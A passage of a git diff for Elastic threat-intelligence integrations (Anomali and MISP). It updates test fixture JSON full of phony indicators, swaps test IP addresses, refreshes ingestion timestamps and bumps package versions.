+ "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6",
 "type": "url",
 "url": {
 "path": "/xonl0ni/yrut8tj0x",
@@ -2655,7 +2655,7 @@
 },
 "event": {
 "severity": 9,
- "ingested": "2021-12-13T05:58:17.138719099Z",
+ "ingested": "2021-12-13T08:39:43.810066300Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -2710,7 +2710,7 @@
 },
 "event": {
 "severity": 3,
- "ingested": "2021-12-13T05:58:17.138720852Z",
+ "ingested": "2021-12-13T08:39:43.810070600Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -2765,7 +2765,7 @@
 },
 "event": {
 "severity": 9,
- "ingested": "2021-12-13T05:58:17.138722585Z",
+ "ingested": "2021-12-13T08:39:43.810074900Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -2820,7 +2820,7 @@
 },
 "event": {
 "severity": 5,
- "ingested": "2021-12-13T05:58:17.138724729Z",
+ "ingested": "2021-12-13T08:39:43.810079200Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -2876,7 +2876,7 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-12-13T05:58:17.138726663Z",
+ "ingested": "2021-12-13T08:39:43.810083500Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -2925,7 +2925,7 @@
 "last_seen": "2020-10-09T18:33:48.000Z",
 "provider": "Phony generated indicator",
 "confidence": "Low",
- "ip": "192.0.2.71",
+ "ip": "192.168.2.71",
 "type": "url",
 "url": {
 "path": "/68fy4w2fb/2rkkjd1wx",
@@ -2939,7 +2939,7 @@
 },
 "event": {
 "severity": 9,
- "ingested": "2021-12-13T05:58:17.138728516Z",
+ "ingested": "2021-12-13T08:39:43.810087900Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -2993,7 +2993,7 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-12-13T05:58:17.138730169Z",
+ "ingested": "2021-12-13T08:39:43.810092500Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -3041,13 +3041,13 @@
 "last_seen": "2020-10-09T18:33:57.000Z",
 "provider": "Phony generated indicator",
 "confidence": "Low",
- "ip": "203.0.113.183",
+ "ip": "192.168.113.183",
 "type": "ipv4-addr"
 }
 },
 "event": {
 "severity": 7,
- "ingested": "2021-12-13T05:58:17.138731772Z",
+ "ingested": "2021-12-13T08:39:43.810096800Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -3095,13 +3095,13 @@
 "last_seen": "2020-10-09T18:34:00.000Z",
 "provider": "Phony generated indicator",
 "confidence": "Med",
- "ip": "192.0.2.125",
+ "ip": "192.168.2.125",
 "type": "ipv4-addr"
 }
 },
 "event": {
 "severity": 5,
- "ingested": "2021-12-13T05:58:17.138733566Z",
+ "ingested": "2021-12-13T08:39:43.810101Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -3148,7 +3148,7 @@
 "last_seen": "2020-10-09T18:34:00.000Z",
 "provider": "Phony generated indicator",
 "confidence": "Low",
- "ip": "203.0.113.54",
+ "ip": "192.168.113.54",
 "type": "url",
 "url": {
 "path": "/brop9/8pj8hj",
@@ -3162,7 +3162,7 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-12-13T05:58:17.138735279Z",
+ "ingested": "2021-12-13T08:39:43.810121900Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -3210,13 +3210,13 @@
 "last_seen": "2020-10-09T18:34:00.000Z",
 "provider": "Phony generated indicator",
 "confidence": "High",
- "ip": "192.0.2.151",
+ "ip": "192.168.2.151",
 "type": "ipv4-addr"
 }
 },
 "event": {
 "severity": 5,
- "ingested": "2021-12-13T05:58:17.138737042Z",
+ "ingested": "2021-12-13T08:39:43.810126100Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -3271,7 +3271,7 @@
 },
 "event": {
 "severity": 3,
- "ingested": "2021-12-13T05:58:17.138738806Z",
+ "ingested": "2021-12-13T08:39:43.810148600Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -3326,7 +3326,7 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-12-13T05:58:17.138740980Z",
+ "ingested": "2021-12-13T08:39:43.810154Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -3382,7 +3382,7 @@
 },
 "event": {
 "severity": 5,
- "ingested": "2021-12-13T05:58:17.138742813Z",
+ "ingested": "2021-12-13T08:39:43.810163400Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -3437,7 +3437,7 @@
 },
 "event": {
 "severity": 5,
- "ingested": "2021-12-13T05:58:17.138744486Z",
+ "ingested": "2021-12-13T08:39:43.810167500Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -3486,7 +3486,7 @@
 "last_seen": "2020-10-09T18:34:17.000Z",
 "provider": "Phony generated indicator",
 "confidence": "Low",
- "ip": "192.0.2.13",
+ "ip": "192.168.2.13",
 "type": "url",
 "url": {
 "path": "/ox1etvpch/6h-6v",
@@ -3500,7 +3500,7 @@
 },
 "event": {
 "severity": 3,
- "ingested": "2021-12-13T05:58:17.138746109Z",
+ "ingested": "2021-12-13T08:39:43.810173600Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -3554,7 +3554,7 @@
 },
 "event": {
 "severity": 9,
- "ingested": "2021-12-13T05:58:17.138748133Z",
+ "ingested": "2021-12-13T08:39:43.810179800Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -3610,7 +3610,7 @@
 },
 "event": {
 "severity": 3,
- "ingested": "2021-12-13T05:58:17.138749766Z",
+ "ingested": "2021-12-13T08:39:43.810184Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -3665,7 +3665,7 @@
 },
 "event": {
 "severity": 9,
- "ingested": "2021-12-13T05:58:17.138751419Z",
+ "ingested": "2021-12-13T08:39:43.810189300Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -3721,7 +3721,7 @@
 },
 "event": {
 "severity": 5,
- "ingested": "2021-12-13T05:58:17.138753213Z",
+ "ingested": "2021-12-13T08:39:43.810196800Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -3777,7 +3777,7 @@
 },
 "event": {
 "severity": 5,
- "ingested": "2021-12-13T05:58:17.138754946Z",
+ "ingested": "2021-12-13T08:39:43.810217700Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -3833,7 +3833,7 @@
 },
 "event": {
 "severity": 9,
- "ingested": "2021-12-13T05:58:17.138756649Z",
+ "ingested": "2021-12-13T08:39:43.810222700Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -3881,13 +3881,13 @@
 "last_seen": "2020-10-09T18:34:41.000Z",
 "provider": "Phony generated indicator",
 "confidence": "High",
- "ip": "203.0.113.106",
+ "ip": "192.168.113.106",
 "type": "ipv4-addr"
 }
 },
 "event": {
 "severity": 5,
- "ingested": "2021-12-13T05:58:17.138758352Z",
+ "ingested": "2021-12-13T08:39:43.810226800Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -3935,7 +3935,7 @@
 "last_seen": "2020-10-09T18:34:43.000Z",
 "provider": "Phony generated indicator",
 "confidence": "High",
- "ip": "203.0.113.160",
+ "ip": "192.168.113.160",
 "type": "url",
 "url": {
 "path": "/5fwsxlb1m/oshqs0",
@@ -3949,7 +3949,7 @@
 },
 "event": {
 "severity": 5,
- "ingested": "2021-12-13T05:58:17.138761328Z",
+ "ingested": "2021-12-13T08:39:43.810232Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -4004,7 +4004,7 @@
 },
 "event": {
 "severity": 3,
- "ingested": "2021-12-13T05:58:17.138763121Z",
+ "ingested": "2021-12-13T08:39:43.810236300Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -4058,7 +4058,7 @@
 },
 "event": {
 "severity": 5,
- "ingested": "2021-12-13T05:58:17.138764905Z",
+ "ingested": "2021-12-13T08:39:43.810242700Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -4112,7 +4112,7 @@
 },
 "event": {
 "severity": 5,
- "ingested": "2021-12-13T05:58:17.138766648Z",
+ "ingested": "2021-12-13T08:39:43.810248700Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -4160,7 +4160,7 @@
 "last_seen": "2020-10-09T18:34:54.000Z",
 "provider": "Phony generated indicator",
 "confidence": "Med",
- "ip": "2001:db8:5bc2:f783:9677:ba10:5335:c6ed",
+ "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6",
 "type": "url",
 "url": {
 "path": "/zkj1wr/ms2dq",
@@ -4174,7 +4174,7 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-12-13T05:58:17.138768411Z",
+ "ingested": "2021-12-13T08:39:43.810253100Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -4228,7 +4228,7 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-12-13T05:58:17.138770114Z",
+ "ingested": "2021-12-13T08:39:43.810258200Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -4283,7 +4283,7 @@
 },
 "event": {
 "severity": 3,
- "ingested": "2021-12-13T05:58:17.138772258Z",
+ "ingested": "2021-12-13T08:39:43.810265800Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -4337,7 +4337,7 @@
 },
 "event": {
 "severity": 3,
- "ingested": "2021-12-13T05:58:17.138773982Z",
+ "ingested": "2021-12-13T08:39:43.810270100Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -4386,7 +4386,7 @@
 "last_seen": "2020-10-09T18:35:04.000Z",
 "provider": "Phony generated indicator",
 "confidence": "High",
- "ip": "203.0.113.111",
+ "ip": "192.168.113.111",
 "type": "url",
 "url": {
 "path": "/29j3q7kc/4l0za3s",
@@ -4400,7 +4400,7 @@
 },
 "event": {
 "severity": 5,
- "ingested": "2021-12-13T05:58:17.138775785Z",
+ "ingested": "2021-12-13T08:39:43.810304900Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -4454,7 +4454,7 @@
 },
 "event": {
 "severity": 5,
- "ingested": "2021-12-13T05:58:17.138777639Z",
+ "ingested": "2021-12-13T08:39:43.810313700Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -4511,7 +4511,7 @@
 },
 "event": {
 "severity": 3,
- "ingested": "2021-12-13T05:58:17.138779392Z",
+ "ingested": "2021-12-13T08:39:43.810318200Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -4559,7 +4559,7 @@
 "last_seen": "2020-10-09T18:44:01.000Z",
 "provider": "Phony generated indicator",
 "confidence": "High",
- "ip": "192.0.2.245",
+ "ip": "192.168.2.245",
 "type": "url",
 "url": {
 "path": "/ffey/ugwd",
@@ -4573,7 +4573,7 @@
 },
 "event": {
 "severity": 5,
- "ingested": "2021-12-13T05:58:17.138781105Z",
+ "ingested": "2021-12-13T08:39:43.810322300Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -4581,10 +4581,10 @@
 "tags": [
 "preserve_original_event",
 "first_seen=2020-02-19T16:22:26",
- "IP=203.0.113.146",
+ "IP=192.168.113.146",
 "qve",
 "9hq86cl",
- "mask=192.0.2.145",
+ "mask=192.168.2.145",
 "popularity=medium"
 ]
 },
@@ -4627,7 +4627,7 @@
 "last_seen": "2020-10-09T18:44:04.000Z",
 "provider": "Phony generated indicator",
 "confidence": "None",
- "ip": "2001:db8:9649:f32a:78d6:6c97:4fc0:b811",
+ "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6",
 "type": "url",
 "url": {
 "path": "/mankgvtpl/1suq",
@@ -4641,7 +4641,7 @@
 },
 "event": {
 "severity": 5,
- "ingested": "2021-12-13T05:58:17.138782798Z",
+ "ingested": "2021-12-13T08:39:43.810327100Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -4694,7 +4694,7 @@
 },
 "event": {
 "severity": 3,
- "ingested": "2021-12-13T05:58:17.138784521Z",
+ "ingested": "2021-12-13T08:39:43.810332900Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -4742,13 +4742,13 @@
 "last_seen": "2020-10-09T18:44:27.000Z",
 "provider": "Phony generated indicator",
 "confidence": "Med",
- "ip": "203.0.113.178",
+ "ip": "192.168.113.178",
 "type": "ipv4-addr"
 }
 },
 "event": {
 "severity": 5,
- "ingested": "2021-12-13T05:58:17.138786235Z",
+ "ingested": "2021-12-13T08:39:43.810338100Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -4756,10 +4756,10 @@
 "tags": [
 "preserve_original_event",
 "first_seen=2020-11-03T00:44:45",
- "IP=203.0.113.133",
+ "IP=192.168.113.133",
 "a7ampeh8",
 "3-9hj92",
- "mask=203.0.113.177",
+ "mask=192.168.113.177",
 "popularity=high"
 ]
 },
@@ -4801,7 +4801,7 @@
 "last_seen": "2020-10-09T18:44:35.000Z",
 "provider": "Phony generated indicator",
 "confidence": "Med",
- "ip": "192.0.2.140",
+ "ip": "192.168.2.140",
 "type": "url",
 "url": {
 "path": "/yw7fom/x6xp",
@@ -4815,7 +4815,7 @@
 },
 "event": {
 "severity": 5,
- "ingested": "2021-12-13T05:58:17.138787888Z",
+ "ingested": "2021-12-13T08:39:43.810342800Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -4863,7 +4863,7 @@
 "last_seen": "2020-10-09T18:44:36.000Z",
 "provider": "Phony generated indicator",
 "confidence": "High",
- "ip": "192.0.2.20",
+ "ip": "192.168.2.20",
 "type": "url",
 "url": {
 "path": "/2vgsz9a/9tzk9",
@@ -4877,7 +4877,7 @@
 },
 "event": {
 "severity": 3,
- "ingested": "2021-12-13T05:58:17.138789611Z",
+ "ingested": "2021-12-13T08:39:43.810346900Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -4926,7 +4926,7 @@
 "last_seen": "2020-10-09T18:44:37.000Z",
 "provider": "Phony generated indicator",
 "confidence": "High",
- "ip": "2001:db8:6258:f48d:45ff:2bd1:5197:ad78",
+ "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6",
 "type": "url",
 "url": {
 "path": "/-upwetee4/-e5xph-c",
@@ -4940,7 +4940,7 @@
 },
 "event": {
 "severity": 3,
- "ingested": "2021-12-13T05:58:17.138791284Z",
+ "ingested": "2021-12-13T08:39:43.810351Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -4948,10 +4948,10 @@
 "tags": [
 "preserve_original_event",
 "first_seen=2020-04-13T09:30:20",
- "IP=203.0.113.221",
+ "IP=192.168.113.221",
 "ciib",
 "o2d",
- "mask=192.0.2.110",
+ "mask=192.168.2.110",
 "popularity=high"
 ]
 },
@@ -4994,7 +4994,7 @@
 "last_seen": "2020-10-09T18:44:45.000Z",
 "provider": "Phony generated indicator",
 "confidence": "Med",
- "ip": "203.0.113.98",
+ "ip": "192.168.113.98",
 "type": "url",
 "url": {
 "path": "/6scni2kd/8-0olo",
@@ -5008,7 +5008,7 @@
 },
 "event": {
 "severity": 3,
- "ingested": "2021-12-13T05:58:17.138792947Z",
+ "ingested": "2021-12-13T08:39:43.810355Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -5056,13 +5056,13 @@
 "last_seen": "2020-10-09T18:44:47.000Z",
 "provider": "Phony generated indicator",
 "confidence": "Med",
- "ip": "2001:db8:2f2:8667:b63b:cb11:fd16:e637",
+ "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6",
 "type": "ipv6-addr"
 }
 },
 "event": {
 "severity": 3,
- "ingested": "2021-12-13T05:58:17.138794811Z",
+ "ingested": "2021-12-13T08:39:43.810359100Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -5073,7 +5073,7 @@
 "IP=2001:db8:12ee:5479:f7f8:33e8:1477:6866",
 "jsk",
 "v2mi3w1",
- "mask=192.0.2.15",
+ "mask=192.168.2.15",
 "popularity=medium"
 ]
 },
@@ -5114,7 +5114,7 @@
 "last_seen": "2020-10-09T18:44:50.000Z",
 "provider": "Phony generated indicator",
 "confidence": "Med",
- "ip": "192.0.2.83",
+ "ip": "192.168.2.83",
 "type": "domain-name",
 "url": {
 "domain": "ekxj6l29.example.org"
@@ -5123,7 +5123,7 @@
 },
 "event": {
 "severity": 5,
- "ingested": "2021-12-13T05:58:17.138796965Z",
+ "ingested": "2021-12-13T08:39:43.810363100Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -5133,7 +5133,7 @@
 "first_seen=2020-11-03T12:54:48",
 "-eqch6ly",
 "rzzt0o",
- "mask=192.0.2.54",
+ "mask=192.168.2.54",
 "popularity=high"
 ]
 },
@@ -5184,7 +5184,7 @@
 },
 "event": {
 "severity": 5,
- "ingested": "2021-12-13T05:58:17.138798668Z",
+ "ingested": "2021-12-13T08:39:43.810367300Z",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -5194,7 +5194,7 @@
 "first_seen=2020-07-22T05:31:21",
 "dq1kmq",
 "ldv0d",
- "mask=203.0.113.252",
+ "mask=192.168.113.252",
 "popularity=high"
 ]
 },
@@ -5236,7 +5236,7 @@ "last_seen": "2020-10-09T18:44:54.000Z", "provider": "Phony generated indicator", "confidence": "Low", - "ip": "203.0.113.162", + "ip": "192.168.113.162", "type": "url", "url": { "path": "/kkbk-6/59l79x", @@ -5250,7 +5250,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-13T05:58:17.138800501Z", + "ingested": "2021-12-13T08:39:43.810371300Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -5297,7 +5297,7 @@ "last_seen": "2020-10-09T18:44:58.000Z", "provider": "Phony generated indicator", "confidence": "None", - "ip": "203.0.113.92", + "ip": "192.168.113.92", "type": "url", "url": { "path": "/nfdi/hied", @@ -5311,7 +5311,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T05:58:17.138802124Z", + "ingested": "2021-12-13T08:39:43.810375700Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -5358,13 +5358,13 @@ "last_seen": "2020-10-09T18:45:05.000Z", "provider": "Phony generated indicator", "confidence": "Low", - "ip": "192.0.2.100", + "ip": "192.168.2.100", "type": "ipv4-addr" } }, "event": { "severity": 7, - "ingested": "2021-12-13T05:58:17.138803878Z", + "ingested": "2021-12-13T08:39:43.810379800Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -5372,10 +5372,10 @@ "tags": [ "preserve_original_event", "first_seen=2020-02-24T00:46:01", - "IP=192.0.2.44", + "IP=192.168.2.44", "or81", "2rukgaof3", - "mask=203.0.113.238", + "mask=192.168.113.238", "popularity=high" ] }, @@ -5428,13 +5428,13 @@ "last_seen": "2021-04-19T08:57:46.000Z", "provider": "Phony generated indicator", "confidence": "Low", - "ip": "192.0.2.16", + "ip": "192.168.2.16", "type": "ipv4-addr" } }, "event": { "severity": 9, - "ingested": "2021-12-13T05:58:17.138805651Z", + "ingested": "2021-12-13T08:39:43.810384100Z", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -5476,13 +5476,13 @@ "last_seen": "2021-04-29T16:02:17.000Z", "provider": "Phony generated indicator", "confidence": "Low", - "ip": "203.0.113.33", + "ip": "192.168.113.33", "type": "ipv4-addr" } }, "event": { "severity": 5, - "ingested": "2021-12-13T05:58:17.138807374Z", + "ingested": "2021-12-13T08:39:43.810388200Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -5526,13 +5526,13 @@ "last_seen": "2021-04-29T16:02:23.000Z", "provider": "Phony generated indicator", "confidence": "None", - "ip": "192.0.2.180", + "ip": "192.168.2.180", "type": "ipv4-addr" } }, "event": { "severity": 9, - "ingested": "2021-12-13T05:58:17.138808977Z", + "ingested": "2021-12-13T08:39:43.810392300Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -5574,13 +5574,13 @@ "last_seen": "2021-04-29T16:02:24.000Z", "provider": "Phony generated indicator", "confidence": "Med", - "ip": "2001:db8:692e:9d99:e3f2:e52d:753a:d1e", + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "type": "ipv6-addr" } }, "event": { "severity": 3, - "ingested": "2021-12-13T05:58:17.138810751Z", + "ingested": "2021-12-13T08:39:43.810396300Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -5624,13 +5624,13 @@ "last_seen": "2021-04-29T16:02:25.000Z", "provider": "Phony generated indicator", "confidence": "Med", - "ip": "203.0.113.116", + "ip": "192.168.113.116", "type": "ipv4-addr" } }, "event": { "severity": 7, - "ingested": "2021-12-13T05:58:17.138812524Z", + "ingested": "2021-12-13T08:39:43.810401900Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -5673,13 +5673,13 @@ "last_seen": "2021-04-29T16:02:25.000Z", "provider": "Phony generated indicator", "confidence": "High", - "ip": "192.0.2.73", + "ip": "192.168.2.73", "type": "ipv4-addr" } }, "event": { "severity": 3, - "ingested": "2021-12-13T05:58:17.138814137Z", + "ingested": "2021-12-13T08:39:43.810406200Z", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -5723,13 +5723,13 @@ "last_seen": "2021-04-29T16:02:26.000Z", "provider": "Phony generated indicator", "confidence": "Med", - "ip": "203.0.113.197", + "ip": "192.168.113.197", "type": "ipv4-addr" } }, "event": { "severity": 3, - "ingested": "2021-12-13T05:58:17.138815830Z", + "ingested": "2021-12-13T08:39:43.810411300Z", "category": "threat", "type": "indicator", "kind": "enrichment" diff --git a/packages/ti_anomali/manifest.yml b/packages/ti_anomali/manifest.yml index eeb00a981ca..43ac7d2e8a8 100644 --- a/packages/ti_anomali/manifest.yml +++ b/packages/ti_anomali/manifest.yml @@ -1,6 +1,6 @@ name: ti_anomali title: Anomali -version: 1.1.1 +version: 1.1.2 release: ga description: Collect threat intelligence from Anomali APIs with Elastic Agent. type: integration diff --git a/packages/ti_misp/changelog.yml b/packages/ti_misp/changelog.yml index a7500fcae6c..5155d19a874 100644 --- a/packages/ti_misp/changelog.yml +++ b/packages/ti_misp/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.0.2" + changes: + - description: Change test public IPs to the supported subset + type: bugfix + link: https://github.com/elastic/integrations/pull/2327 - version: "1.0.1" changes: - description: Bump minimum version diff --git a/packages/ti_misp/data_stream/threat/_dev/test/pipeline/test-misp-attributes-ndjson.log-expected.json b/packages/ti_misp/data_stream/threat/_dev/test/pipeline/test-misp-attributes-ndjson.log-expected.json index 3ea95be1883..f21e045dee6 100644 --- a/packages/ti_misp/data_stream/threat/_dev/test/pipeline/test-misp-attributes-ndjson.log-expected.json +++ b/packages/ti_misp/data_stream/threat/_dev/test/pipeline/test-misp-attributes-ndjson.log-expected.json 
@@ -60,7 +60,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:39.827750004Z", + "ingested": "2021-12-09T13:49:02.948915100Z", "original": "{\"Event\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Payload installation\",\"comment\":\"Contextual comment for the file md5 attribute\",\"deleted\":false,\"disable_correlation\":false,\"distribution\":\"5\",\"event_id\":\"3631\",\"first_seen\":null,\"id\":\"266258\",\"last_seen\":null,\"object_id\":\"0\",\"object_relation\":null,\"sharing_group_id\":\"0\",\"timestamp\":\"1621588162\",\"to_ids\":false,\"type\":\"md5\",\"uuid\":\"34c59b06-d35d-4808-919c-4b452f185c52\",\"value\":\"70461da8b94c6ca5d2fda3260c5a8c3b\"},\"EventReport\":[],\"Galaxy\":[],\"Object\":[],\"Org\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"Orgc\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"RelatedEvent\":[{\"Event\":{\"Org\":{\"id\":\"1\",\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"Orgc\":{\"id\":\"1\",\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"analysis\":\"0\",\"date\":\"2021-05-21\",\"distribution\":\"1\",\"id\":\"3633\",\"info\":\"Test event 3 objects and attributes\",\"org_id\":\"1\",\"orgc_id\":\"1\",\"published\":false,\"threat_level_id\":\"1\",\"timestamp\":\"1621592532\",\"uuid\":\"4edb20c7-8175-484d-bdcd-fce6872c1ef3\"}}],\"ShadowAttribute\":[],\"analysis\":\"0\",\"attribute_count\":\"1\",\"date\":\"2021-05-21\",\"disable_correlation\":false,\"distribution\":\"1\",\"event_creator_email\":\"admin@admin.test\",\"extends_uuid\":\"\",\"id\":\"3631\",\"info\":\"Test event 1 just 
atrributes\",\"locked\":false,\"org_id\":\"1\",\"orgc_id\":\"1\",\"proposal_email_lock\":false,\"publish_timestamp\":\"0\",\"published\":false,\"sharing_group_id\":\"0\",\"threat_level_id\":\"1\",\"timestamp\":\"1621588162\",\"uuid\":\"8ca56ae9-3747-4172-93d2-808da1a4eaf3\"}}", "category": "threat", "type": "indicator", 
@@ -136,7 +136,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:39.827777676Z", + "ingested": "2021-12-09T13:49:02.948923600Z", "original": "{\"Event\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Artifacts dropped\",\"comment\":\"Artefact dropped for test 2\",\"deleted\":false,\"disable_correlation\":false,\"distribution\":\"5\",\"event_id\":\"3632\",\"first_seen\":null,\"id\":\"266259\",\"last_seen\":null,\"object_id\":\"0\",\"object_relation\":null,\"sharing_group_id\":\"0\",\"timestamp\":\"1621588675\",\"to_ids\":true,\"type\":\"md5\",\"uuid\":\"73102a1c-7432-47b7-9644-6f9d46b6887c\",\"value\":\"60461da8b94c6ca5d2fda3260c5a8c3b\"},\"EventReport\":[],\"Galaxy\":[],\"Object\":[],\"Org\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"Orgc\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"RelatedEvent\":[{\"Event\":{\"Org\":{\"id\":\"1\",\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"Orgc\":{\"id\":\"2\",\"name\":\"CIRCL\",\"uuid\":\"55f6ea5e-2c60-40e5-964f-47a8950d210f\"},\"analysis\":\"2\",\"date\":\"2018-03-26\",\"distribution\":\"3\",\"id\":\"684\",\"info\":\"OSINT - Forgot About Default Accounts? 
No Worries, GoScanSSH Didn’t\",\"org_id\":\"1\",\"orgc_id\":\"2\",\"published\":true,\"threat_level_id\":\"3\",\"timestamp\":\"1523865236\",\"uuid\":\"5acdb4d0-b534-4713-9612-4a1d950d210f\"}}],\"ShadowAttribute\":[],\"analysis\":\"0\",\"attribute_count\":\"4\",\"date\":\"2021-05-21\",\"disable_correlation\":false,\"distribution\":\"1\",\"event_creator_email\":\"admin@admin.test\",\"extends_uuid\":\"\",\"id\":\"3632\",\"info\":\"Test event 2 just more atrributes\",\"locked\":false,\"org_id\":\"1\",\"orgc_id\":\"1\",\"proposal_email_lock\":false,\"publish_timestamp\":\"0\",\"published\":false,\"sharing_group_id\":\"0\",\"threat_level_id\":\"2\",\"timestamp\":\"1621588836\",\"uuid\":\"efbca287-edb5-4ad7-b8e4-fe9da514a763\"}}", "category": "threat", "type": "indicator", 
@@ -210,7 +210,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:39.827786984Z", + "ingested": "2021-12-09T13:49:02.948930100Z", "original": "{\"Event\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Network activity\",\"comment\":\"Conext for domain type attribute event 2\",\"deleted\":false,\"disable_correlation\":false,\"distribution\":\"5\",\"event_id\":\"3632\",\"first_seen\":null,\"id\":\"266260\",\"last_seen\":null,\"object_id\":\"0\",\"object_relation\":null,\"sharing_group_id\":\"0\",\"timestamp\":\"1621588744\",\"to_ids\":true,\"type\":\"domain\",\"uuid\":\"a52a1b47-a580-4f33-96ba-939cf9146c9b\",\"value\":\"baddom.madeup.local\"},\"EventReport\":[],\"Galaxy\":[],\"Object\":[],\"Org\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"Orgc\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"RelatedEvent\":[{\"Event\":{\"Org\":{\"id\":\"1\",\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"Orgc\":{\"id\":\"2\",\"name\":\"CIRCL\",\"uuid\":\"55f6ea5e-2c60-40e5-964f-47a8950d210f\"},\"analysis\":\"2\",\"date\":\"2018-03-26\",\"distribution\":\"3\",\"id\":\"684\",\"info\":\"OSINT - Forgot About Default Accounts? 
